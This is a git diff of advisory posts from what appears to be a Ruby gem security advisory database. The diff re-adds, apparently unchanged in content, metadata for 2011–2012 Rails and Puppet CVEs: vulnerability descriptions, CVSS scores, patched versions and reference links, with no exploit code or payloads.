--- a/advisories/_posts/2017-10-24-CVE-2011-2931.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-2931.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2011-2931 (actionpack): XSS Vulnerability in strip_tags helper in rails/actionpack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2011-2931
-  ghsa: v5jg-558j-q67c
-  url: http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
-  title: XSS Vulnerability in strip_tags helper in rails/actionpack
-  date: 2017-10-24
-  description: |
-    Cross-site scripting (XSS) vulnerability in the strip_tags helper
-    in actionpack/lib/action_controller/vendor/html-scanner/html/node.rb
-    in Ruby on Rails before 2.3.13, 3.0.x before 3.0.10, and 3.1.x
-    before 3.1.0.rc5 allows remote attackers to inject arbitrary web
-    script or HTML via a tag with an invalid name.
-  cvss_v2: 4.3
-  unaffected_versions:
-  - "< 2.0.0"
-  - "< 3.0.0"
-  patched_versions:
-  - "~> 2.3.13"
-  - ">= 3.0.10"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-2931
-    - http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
-    - https://groups.google.com/g/rubyonrails-security/c/K5EwdJt06hI
-    - https://github.com/rails/rails/commit/586a944ddd4d03e66dea1093306147594748037a
-    - https://bugzilla.redhat.com/show_bug.cgi?id=731436
-    - https://github.com/advisories/GHSA-v5jg-558j-q67c
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065109.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065137.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065212.html
-    - http://www.debian.org/security/2011/dsa-2301
-    - http://www.openwall.com/lists/oss-security/2011/08/17/1
-    - http://www.openwall.com/lists/oss-security/2011/08/19/11
-    - http://www.openwall.com/lists/oss-security/2011/08/20/1
-    - http://www.openwall.com/lists/oss-security/2011/08/22/13
-    - http://www.openwall.com/lists/oss-security/2011/08/22/14
-    - http://www.openwall.com/lists/oss-security/2011/08/22/5
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/45921
----
+---
+layout: advisory
+title: 'CVE-2011-2931 (actionpack): XSS Vulnerability in strip_tags helper in rails/actionpack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2011-2931
+  ghsa: v5jg-558j-q67c
+  url: http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
+  title: XSS Vulnerability in strip_tags helper in rails/actionpack
+  date: 2017-10-24
+  description: |
+    Cross-site scripting (XSS) vulnerability in the strip_tags helper
+    in actionpack/lib/action_controller/vendor/html-scanner/html/node.rb
+    in Ruby on Rails before 2.3.13, 3.0.x before 3.0.10, and 3.1.x
+    before 3.1.0.rc5 allows remote attackers to inject arbitrary web
+    script or HTML via a tag with an invalid name.
+  cvss_v2: 4.3
+  unaffected_versions:
+  - "< 2.0.0"
+  - "< 3.0.0"
+  patched_versions:
+  - "~> 2.3.13"
+  - ">= 3.0.10"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-2931
+    - http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
+    - https://groups.google.com/g/rubyonrails-security/c/K5EwdJt06hI
+    - https://github.com/rails/rails/commit/586a944ddd4d03e66dea1093306147594748037a
+    - https://bugzilla.redhat.com/show_bug.cgi?id=731436
+    - https://github.com/advisories/GHSA-v5jg-558j-q67c
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065109.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065137.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065212.html
+    - http://www.debian.org/security/2011/dsa-2301
+    - http://www.openwall.com/lists/oss-security/2011/08/17/1
+    - http://www.openwall.com/lists/oss-security/2011/08/19/11
+    - http://www.openwall.com/lists/oss-security/2011/08/20/1
+    - http://www.openwall.com/lists/oss-security/2011/08/22/13
+    - http://www.openwall.com/lists/oss-security/2011/08/22/14
+    - http://www.openwall.com/lists/oss-security/2011/08/22/5
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/45921
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-2932.md b/advisories/_posts/2017-10-24-CVE-2011-2932.md
index a7a58e18..e323e677 100644
--- a/advisories/_posts/2017-10-24-CVE-2011-2932.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-2932.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'CVE-2011-2932 (activesupport): UTF-8 escaping vulnerability in rails/activesupport'
-comments: false
-categories:
-- activesupport
-- rails
-advisory:
-  gem: activesupport
-  framework: rails
-  cve: 2011-2932
-  ghsa: 9fh3-vh3h-q4g3
-  url: http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
-  title: UTF-8 escaping vulnerability in rails/activesupport
-  date: 2017-10-24
-  description: |
-    Cross-site scripting (XSS) vulnerability in
-    activesupport/lib/active_support/core_ext/string/output_safety.rb
-    in Ruby on Rails 2.x before 2.3.13, 3.0.x before 3.0.10, and
-    3.1.x before 3.1.0.rc5 allows remote attackers to inject arbitrary
-    web script or HTML via a malformed Unicode string, related to
-    a "UTF-8 escaping vulnerability."
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 2.3.13"
-  - "~> 3.0.10"
-  - "~> 3.1.0.rc5"
-  - ">= 3.1.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-2932
-    - http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
-    - https://groups.google.com/g/rubyonrails-security/c/Vr_7WSOrEZU/m/IZ_bc5d00vEJ
-    - https://github.com/rails/rails/commit/bfc432574d0b141fd7fe759edfe9b6771dd306bd
-    - https://bugzilla.redhat.com/show_bug.cgi?id=731435
-    - https://github.com/advisories/GHSA-9fh3-vh3h-q4g3
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065114.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065189.html
-    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065212.html
-    - http://www.openwall.com/lists/oss-security/2011/08/17/1
-    - http://www.openwall.com/lists/oss-security/2011/08/19/11
-    - http://www.openwall.com/lists/oss-security/2011/08/20/1
-    - http://www.openwall.com/lists/oss-security/2011/08/22/13
-    - http://www.openwall.com/lists/oss-security/2011/08/22/14
-    - http://www.openwall.com/lists/oss-security/2011/08/22/5
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/45917
----
+---
+layout: advisory
+title: 'CVE-2011-2932 (activesupport): UTF-8 escaping vulnerability in rails/activesupport'
+comments: false
+categories:
+- activesupport
+- rails
+advisory:
+  gem: activesupport
+  framework: rails
+  cve: 2011-2932
+  ghsa: 9fh3-vh3h-q4g3
+  url: http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
+  title: UTF-8 escaping vulnerability in rails/activesupport
+  date: 2017-10-24
+  description: |
+    Cross-site scripting (XSS) vulnerability in
+    activesupport/lib/active_support/core_ext/string/output_safety.rb
+    in Ruby on Rails 2.x before 2.3.13, 3.0.x before 3.0.10, and
+    3.1.x before 3.1.0.rc5 allows remote attackers to inject arbitrary
+    web script or HTML via a malformed Unicode string, related to
+    a "UTF-8 escaping vulnerability."
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 2.3.13"
+  - "~> 3.0.10"
+  - "~> 3.1.0.rc5"
+  - ">= 3.1.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-2932
+    - http://weblog.rubyonrails.org/2011/8/16/ann-rails-3-1-0-rc6
+    - https://groups.google.com/g/rubyonrails-security/c/Vr_7WSOrEZU/m/IZ_bc5d00vEJ
+    - https://github.com/rails/rails/commit/bfc432574d0b141fd7fe759edfe9b6771dd306bd
+    - https://bugzilla.redhat.com/show_bug.cgi?id=731435
+    - https://github.com/advisories/GHSA-9fh3-vh3h-q4g3
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065114.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065189.html
+    - http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065212.html
+    - http://www.openwall.com/lists/oss-security/2011/08/17/1
+    - http://www.openwall.com/lists/oss-security/2011/08/19/11
+    - http://www.openwall.com/lists/oss-security/2011/08/20/1
+    - http://www.openwall.com/lists/oss-security/2011/08/22/13
+    - http://www.openwall.com/lists/oss-security/2011/08/22/14
+    - http://www.openwall.com/lists/oss-security/2011/08/22/5
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/45917
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-3187.md b/advisories/_posts/2017-10-24-CVE-2011-3187.md
index 181657f8..beb3a834 100644
--- a/advisories/_posts/2017-10-24-CVE-2011-3187.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-3187.md
@@ -1,41 +1,41 @@
----
-layout: advisory
-title: 'CVE-2011-3187 (actionpack): Ruby on rails 3.0.5 Remote_IP.rb Input Validation
-  in rails/actionpack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2011-3187
-  ghsa: 3vfw-7rcp-3xgm
-  url: http://webservsec.blogspot.com/2011/02/ruby-on-rails-vulnerability.html
-  title: Ruby on rails 3.0.5 Remote_IP.rb Input Validation in rails/actionpack
-  date: 2017-10-24
-  description: |
-    The to_s method in actionpack/lib/action_dispatch/middleware/remote_ip.rb
-    in Ruby on Rails 3.0.5 does not validate the X-Forwarded-For header
-    in requests from IP addresses on a Class C network, which might allow
-    remote attackers to inject arbitrary text into log files or bypass
-    intended address parsing via a crafted header.
-  cvss_v2: 4.3
-  unaffected_versions:
-  - "< 2.3.0"
-  patched_versions:
-  - ">= 2.3.13"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-3187
-    - http://webservsec.blogspot.com/2011/02/ruby-on-rails-vulnerability.html
-    - https://github.com/advisories/GHSA-3vfw-7rcp-3xgm
-    - https://www.rapid7.com/db/vulnerabilities/ruby_on_rails-cve-2011-3187
-    - http://www.openwall.com/lists/oss-security/2011/08/17/1
-    - http://www.openwall.com/lists/oss-security/2011/08/19/11
-    - http://www.openwall.com/lists/oss-security/2011/08/20/1
-    - http://www.openwall.com/lists/oss-security/2011/08/22/13
-    - http://www.openwall.com/lists/oss-security/2011/08/22/14
-    - http://www.openwall.com/lists/oss-security/2011/08/22/5
-    - https://web.archive.org/web/20111209181000/http://archives.neohapsis.com/archives/fulldisclosure/2011-02/0337.html
----
+---
+layout: advisory
+title: 'CVE-2011-3187 (actionpack): Ruby on rails 3.0.5 Remote_IP.rb Input Validation
+  in rails/actionpack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2011-3187
+  ghsa: 3vfw-7rcp-3xgm
+  url: http://webservsec.blogspot.com/2011/02/ruby-on-rails-vulnerability.html
+  title: Ruby on rails 3.0.5 Remote_IP.rb Input Validation in rails/actionpack
+  date: 2017-10-24
+  description: |
+    The to_s method in actionpack/lib/action_dispatch/middleware/remote_ip.rb
+    in Ruby on Rails 3.0.5 does not validate the X-Forwarded-For header
+    in requests from IP addresses on a Class C network, which might allow
+    remote attackers to inject arbitrary text into log files or bypass
+    intended address parsing via a crafted header.
+  cvss_v2: 4.3
+  unaffected_versions:
+  - "< 2.3.0"
+  patched_versions:
+  - ">= 2.3.13"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-3187
+    - http://webservsec.blogspot.com/2011/02/ruby-on-rails-vulnerability.html
+    - https://github.com/advisories/GHSA-3vfw-7rcp-3xgm
+    - https://www.rapid7.com/db/vulnerabilities/ruby_on_rails-cve-2011-3187
+    - http://www.openwall.com/lists/oss-security/2011/08/17/1
+    - http://www.openwall.com/lists/oss-security/2011/08/19/11
+    - http://www.openwall.com/lists/oss-security/2011/08/20/1
+    - http://www.openwall.com/lists/oss-security/2011/08/22/13
+    - http://www.openwall.com/lists/oss-security/2011/08/22/14
+    - http://www.openwall.com/lists/oss-security/2011/08/22/5
+    - https://web.archive.org/web/20111209181000/http://archives.neohapsis.com/archives/fulldisclosure/2011-02/0337.html
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2011-4319.md b/advisories/_posts/2017-10-24-CVE-2011-4319.md
index 9381c5fb..83d6cb86 100644
--- a/advisories/_posts/2017-10-24-CVE-2011-4319.md
+++ b/advisories/_posts/2017-10-24-CVE-2011-4319.md
@@ -1,51 +1,51 @@
----
-layout: advisory
-title: 'CVE-2011-4319 (actionpack): Cross-site Scripting vulnerability in i18n translations
-  helper method'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2011-4319
-  osvdb: 77199
-  ghsa: xxr8-833v-c7wc
-  url: http://weblog.rubyonrails.org/2011/11/18/rails-3-0-11-has-been-released
-  title: Cross-site Scripting vulnerability in i18n translations helper method
-  date: 2017-10-24
-  description: |
-    A cross-site scripting (XSS) flaw was found in the way the 'translate' helper
-    method of the Ruby on Rails performed HTML escaping of interpolated user
-    input, when interpolation in combination with HTML-safe translations were
-    used. A remote attacker could use this flaw to execute arbitrary HTML or web
-    script by providing a specially-crafted input to Ruby on Rails application,
-    using the ActionPack module and its 'translate' helper method without explicit
-    (application specific) sanitization of user provided input.
-
-    Cross-site scripting (XSS) vulnerability in the i18n translations helper
-    method in Ruby on Rails 3.0.x before 3.0.11 and 3.1.x before 3.1.2,
-    and the rails_xss plugin in Ruby on Rails 2.3.x, allows remote
-    attackers to inject arbitrary web script or HTML via vectors related
-    to a translations string whose name ends with an "html" substring.
-  cvss_v2: 4.3
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - "~> 3.0.11"
-  - ">= 3.1.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2011-4319
-    - http://weblog.rubyonrails.org/2011/11/18/rails-3-0-11-has-been-released
-    - http://weblog.rubyonrails.org/2011/11/18/rails-3-1-2-has-been-released
-    - https://groups.google.com/g/rubyonrails-security/c/K2HXD7c8fMU
-    - https://groups.google.com/g/rubyonrails-security/c/K2HXD7c8fMU/m/gt22xPskXMYJ
-    - https://github.com/advisories/GHSA-xxr8-833v-c7wc
-    - http://osvdb.org/77199
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71364
-    - http://openwall.com/lists/oss-security/2011/11/18/8
-    - https://web.archive.org/web/20210121211512/http://www.securityfocus.com/bid/50722
-    - https://web.archive.org/web/20201208053819/http://www.securitytracker.com/id?1026342
----
+---
+layout: advisory
+title: 'CVE-2011-4319 (actionpack): Cross-site Scripting vulnerability in i18n translations
+  helper method'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2011-4319
+  osvdb: 77199
+  ghsa: xxr8-833v-c7wc
+  url: http://weblog.rubyonrails.org/2011/11/18/rails-3-0-11-has-been-released
+  title: Cross-site Scripting vulnerability in i18n translations helper method
+  date: 2017-10-24
+  description: |
+    A cross-site scripting (XSS) flaw was found in the way the 'translate' helper
+    method of the Ruby on Rails performed HTML escaping of interpolated user
+    input, when interpolation in combination with HTML-safe translations were
+    used. A remote attacker could use this flaw to execute arbitrary HTML or web
+    script by providing a specially-crafted input to Ruby on Rails application,
+    using the ActionPack module and its 'translate' helper method without explicit
+    (application specific) sanitization of user provided input.
+
+    Cross-site scripting (XSS) vulnerability in the i18n translations helper
+    method in Ruby on Rails 3.0.x before 3.0.11 and 3.1.x before 3.1.2,
+    and the rails_xss plugin in Ruby on Rails 2.3.x, allows remote
+    attackers to inject arbitrary web script or HTML via vectors related
+    to a translations string whose name ends with an "html" substring.
+  cvss_v2: 4.3
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - "~> 3.0.11"
+  - ">= 3.1.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-4319
+    - http://weblog.rubyonrails.org/2011/11/18/rails-3-0-11-has-been-released
+    - http://weblog.rubyonrails.org/2011/11/18/rails-3-1-2-has-been-released
+    - https://groups.google.com/g/rubyonrails-security/c/K2HXD7c8fMU
+    - https://groups.google.com/g/rubyonrails-security/c/K2HXD7c8fMU/m/gt22xPskXMYJ
+    - https://github.com/advisories/GHSA-xxr8-833v-c7wc
+    - http://osvdb.org/77199
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/71364
+    - http://openwall.com/lists/oss-security/2011/11/18/8
+    - https://web.archive.org/web/20210121211512/http://www.securityfocus.com/bid/50722
+    - https://web.archive.org/web/20201208053819/http://www.securitytracker.com/id?1026342
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2012-1989.md b/advisories/_posts/2017-10-24-CVE-2012-1989.md
index 5b190523..215df469 100644
--- a/advisories/_posts/2017-10-24-CVE-2012-1989.md
+++ b/advisories/_posts/2017-10-24-CVE-2012-1989.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2012-1989 (puppet): Arbitrary File Write Access in Puppet'
-comments: false
-categories:
-- puppet
-advisory:
-  gem: puppet
-  cve: 2012-1989
-  ghsa: c5qq-g673-5p49
-  url: https://www.puppet.com/security/cve/cve-2012-1989-arbitrary-file-write-access
-  title: Arbitrary File Write Access in Puppet
-  date: 2017-10-24
-  description: |
-    telnet.rb in Puppet 2.7.x before 2.7.13 and Puppet Enterprise
-    (PE) 1.2.x, 2.0.x, and 2.5.x before 2.5.1 allows local users
-    to overwrite arbitrary files via a symlink attack on the
-    NET::Telnet connection log (/tmp/out.log).
-  cvss_v2: 3.6
-  unaffected_versions:
-  - "< 2.7.1"
-  patched_versions:
-  - "~> 2.5.1"
-  - ">= 2.7.13"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-1989
-    - https://www.puppet.com/security/cve/cve-2012-1989-arbitrary-file-write-access
-    - https://github.com/advisories/GHSA-c5qq-g673-5p49
-    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74797
-    - https://security.gentoo.org/glsa/201208-02
-    - http://ubuntu.com/usn/usn-1419-1
-    - http://lists.opensuse.org/opensuse-updates/2012-05/msg00012.html
-    - https://web.archive.org/web/20210121211512/http://www.securityfocus.com/bid/52975
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/49136
-    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/48748
-    - https://web.archive.org/web/20121025194938/http://secunia.com/advisories/48743
----
+---
+layout: advisory
+title: 'CVE-2012-1989 (puppet): Arbitrary File Write Access in Puppet'
+comments: false
+categories:
+- puppet
+advisory:
+  gem: puppet
+  cve: 2012-1989
+  ghsa: c5qq-g673-5p49
+  url: https://www.puppet.com/security/cve/cve-2012-1989-arbitrary-file-write-access
+  title: Arbitrary File Write Access in Puppet
+  date: 2017-10-24
+  description: |
+    telnet.rb in Puppet 2.7.x before 2.7.13 and Puppet Enterprise
+    (PE) 1.2.x, 2.0.x, and 2.5.x before 2.5.1 allows local users
+    to overwrite arbitrary files via a symlink attack on the
+    NET::Telnet connection log (/tmp/out.log).
+  cvss_v2: 3.6
+  unaffected_versions:
+  - "< 2.7.1"
+  patched_versions:
+  - "~> 2.5.1"
+  - ">= 2.7.13"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-1989
+    - https://www.puppet.com/security/cve/cve-2012-1989-arbitrary-file-write-access
+    - https://github.com/advisories/GHSA-c5qq-g673-5p49
+    - https://exchange.xforce.ibmcloud.com/vulnerabilities/74797
+    - https://security.gentoo.org/glsa/201208-02
+    - http://ubuntu.com/usn/usn-1419-1
+    - http://lists.opensuse.org/opensuse-updates/2012-05/msg00012.html
+    - https://web.archive.org/web/20210121211512/http://www.securityfocus.com/bid/52975
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/49136
+    - https://web.archive.org/web/20111225083933/http://secunia.com/advisories/48748
+    - https://web.archive.org/web/20121025194938/http://secunia.com/advisories/48743
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2012-2660.md b/advisories/_posts/2017-10-24-CVE-2012-2660.md
index 2163ab44..38fedba7 100644
--- a/advisories/_posts/2017-10-24-CVE-2012-2660.md
+++ b/advisories/_posts/2017-10-24-CVE-2012-2660.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2012-2660 (actionpack): Unsafe Query Generation Risk in Ruby on Rails'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2012-2660
-  ghsa: hgpp-pp89-4fgf
-  url: https://groups.google.com/g/rubyonrails-security/c/8SA-M3as7A8/m/Mr9fi9X4kNgJ
-  title: Unsafe Query Generation Risk in Ruby on Rails
-  date: 2017-10-24
-  description: |
-    actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails
-    before 3.0.13, 3.1.x before 3.1.5, and 3.2.x before 3.2.4 does not
-    properly consider differences in parameter handling between the
-    Active Record component and the Rack interface, which allows remote
-    attackers to bypass intended database-query restrictions and perform
-    NULL checks via a crafted request, as demonstrated by certain
-    "[nil]" values, a related issue to CVE-2012-2694.
-  cvss_v2: 6.4
-  patched_versions:
-  - "~> 3.0.13"
-  - "~> 3.1.5"
-  - ">= 3.2.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-2660
-    - https://groups.google.com/g/rubyonrails-security/c/8SA-M3as7A8/m/Mr9fi9X4kNgJ
-    - https://github.com/advisories/GHSA-hgpp-pp89-4fgf
-    - http://rhn.redhat.com/errata/RHSA-2013-0154.html
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00002.html
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00014.html
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00016.html
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00017.html
-    - http://lists.opensuse.org/opensuse-updates/2012-08/msg00046.html
----
+---
+layout: advisory
+title: 'CVE-2012-2660 (actionpack): Unsafe Query Generation Risk in Ruby on Rails'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2012-2660
+  ghsa: hgpp-pp89-4fgf
+  url: https://groups.google.com/g/rubyonrails-security/c/8SA-M3as7A8/m/Mr9fi9X4kNgJ
+  title: Unsafe Query Generation Risk in Ruby on Rails
+  date: 2017-10-24
+  description: |
+    actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails
+    before 3.0.13, 3.1.x before 3.1.5, and 3.2.x before 3.2.4 does not
+    properly consider differences in parameter handling between the
+    Active Record component and the Rack interface, which allows remote
+    attackers to bypass intended database-query restrictions and perform
+    NULL checks via a crafted request, as demonstrated by certain
+    "[nil]" values, a related issue to CVE-2012-2694.
+  cvss_v2: 6.4
+  patched_versions:
+  - "~> 3.0.13"
+  - "~> 3.1.5"
+  - ">= 3.2.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-2660
+    - https://groups.google.com/g/rubyonrails-security/c/8SA-M3as7A8/m/Mr9fi9X4kNgJ
+    - https://github.com/advisories/GHSA-hgpp-pp89-4fgf
+    - http://rhn.redhat.com/errata/RHSA-2013-0154.html
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00002.html
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00014.html
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00016.html
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00017.html
+    - http://lists.opensuse.org/opensuse-updates/2012-08/msg00046.html
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2012-2694.md b/advisories/_posts/2017-10-24-CVE-2012-2694.md
index 2b1fab04..db4c1453 100644
--- a/advisories/_posts/2017-10-24-CVE-2012-2694.md
+++ b/advisories/_posts/2017-10-24-CVE-2012-2694.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2012-2694 (actionpack): Unsafe Query Generation Risk in Ruby on Rails'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2012-2694
-  ghsa: q34c-48gc-m9g8
-  url: https://groups.google.com/g/rubyonrails-security/c/jILZ34tAHF4/m/7x0hLH-o0-IJ
-  title: Unsafe Query Generation Risk in Ruby on Rails
-  date: 2017-10-24
-  description: |
-    actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails
-    before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not
-    properly consider differences in parameter handling between the
-    Active Record component and the Rack interface, which allows remote
-    attackers to bypass intended database-query restrictions and perform
-    NULL checks via a crafted request, as demonstrated by certain
-    "['xyz', nil]" values, a related issue to CVE-2012-2660.
-  cvss_v2: 4.3
-  patched_versions:
-  - "~> 3.0.14"
-  - "~> 3.1.6"
-  - ">= 3.2.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-2694
-    - https://groups.google.com/g/rubyonrails-security/c/jILZ34tAHF4/m/7x0hLH-o0-IJ
-    - https://github.com/advisories/GHSA-q34c-48gc-m9g8
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00002.html
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00014.html
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00016.html
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00017.html
-    - http://lists.opensuse.org/opensuse-updates/2012-08/msg00046.html
-    - http://rhn.redhat.com/errata/RHSA-2013-0154.html
----
+---
+layout: advisory
+title: 'CVE-2012-2694 (actionpack): Unsafe Query Generation Risk in Ruby on Rails'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2012-2694
+  ghsa: q34c-48gc-m9g8
+  url: https://groups.google.com/g/rubyonrails-security/c/jILZ34tAHF4/m/7x0hLH-o0-IJ
+  title: Unsafe Query Generation Risk in Ruby on Rails
+  date: 2017-10-24
+  description: |
+    actionpack/lib/action_dispatch/http/request.rb in Ruby on Rails
+    before 3.0.14, 3.1.x before 3.1.6, and 3.2.x before 3.2.6 does not
+    properly consider differences in parameter handling between the
+    Active Record component and the Rack interface, which allows remote
+    attackers to bypass intended database-query restrictions and perform
+    NULL checks via a crafted request, as demonstrated by certain
+    "['xyz', nil]" values, a related issue to CVE-2012-2660.
+  cvss_v2: 4.3
+  patched_versions:
+  - "~> 3.0.14"
+  - "~> 3.1.6"
+  - ">= 3.2.6"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2012-2694
+    - https://groups.google.com/g/rubyonrails-security/c/jILZ34tAHF4/m/7x0hLH-o0-IJ
+    - https://github.com/advisories/GHSA-q34c-48gc-m9g8
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00002.html
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00014.html
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00016.html
+    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00017.html
+    - http://lists.opensuse.org/opensuse-updates/2012-08/msg00046.html
+    - http://rhn.redhat.com/errata/RHSA-2013-0154.html
+---
diff --git a/advisories/_posts/2017-10-24-CVE-2012-2695.md b/advisories/_posts/2017-10-24-CVE-2012-2695.md
index e5445cd4..e3d10fa0 100644
--- a/advisories/_posts/2017-10-24-CVE-2012-2695.md
+++ b/advisories/_posts/2017-10-24-CVE-2012-2695.md
@@ -1,38 +1,38 @@
----
-layout: advisory
-title: 'CVE-2012-2695 (activerecord): SQL Injection Vulnerability in Ruby on Rails'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2012-2695
-  ghsa: 76wq-xw4h-f8wj
-  url: https://groups.google.com/g/rubyonrails-security/c/l4L0TEVAz1k/m/Vr84sD9B464J
-  title: SQL Injection Vulnerability in Ruby on Rails
-  date: 2017-10-24
-  description: |
-    The Active Record component in Ruby on Rails before 3.0.14, 3.1.x
-    before 3.1.6, and 3.2.x before 3.2.6 does not properly implement
-    the passing of request data to a where method in an ActiveRecord
-    class, which allows remote attackers to conduct certain SQL
-    injection attacks via nested query parameters that leverage
-    improper handling of nested hashes, a related issue to CVE-2012-2661.
-  cvss_v2: 7.5
-  patched_versions:
-  - "~> 3.0.14"
-  - "~> 3.1.6"
-  - ">= 3.2.6"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2012-2695
-    - https://groups.google.com/g/rubyonrails-security/c/l4L0TEVAz1k/m/Vr84sD9B464J
-    - https://github.com/advisories/GHSA-76wq-xw4h-f8wj
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00002.html
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00014.html
-    - http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00016.html
-    - http://lists.opensuse.org/opensuse-updates/2012-08/msg00046.html
-    - http://rhn.redhat.com/errata/RHSA-2013-0154.html
----
+---
+layout: advisory
+title: 'CVE-2012-2695 (activerecord): SQL Injection Vulnerability in Ruby on Rails'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2012-2695
+  ghsa: 76wq-xw4h-f8wj
+  url: https://groups.google.com/g/rubyonrails-security/c/l4L0TEVAz1k/m/Vr84sD9B464J
+  title: SQL Injection Vulnerability in Ruby on Rails
+  date: 2017-10-24
+  description: |
+    The Active Record component in Ruby on Rails before 3.0.14, 3.1.x
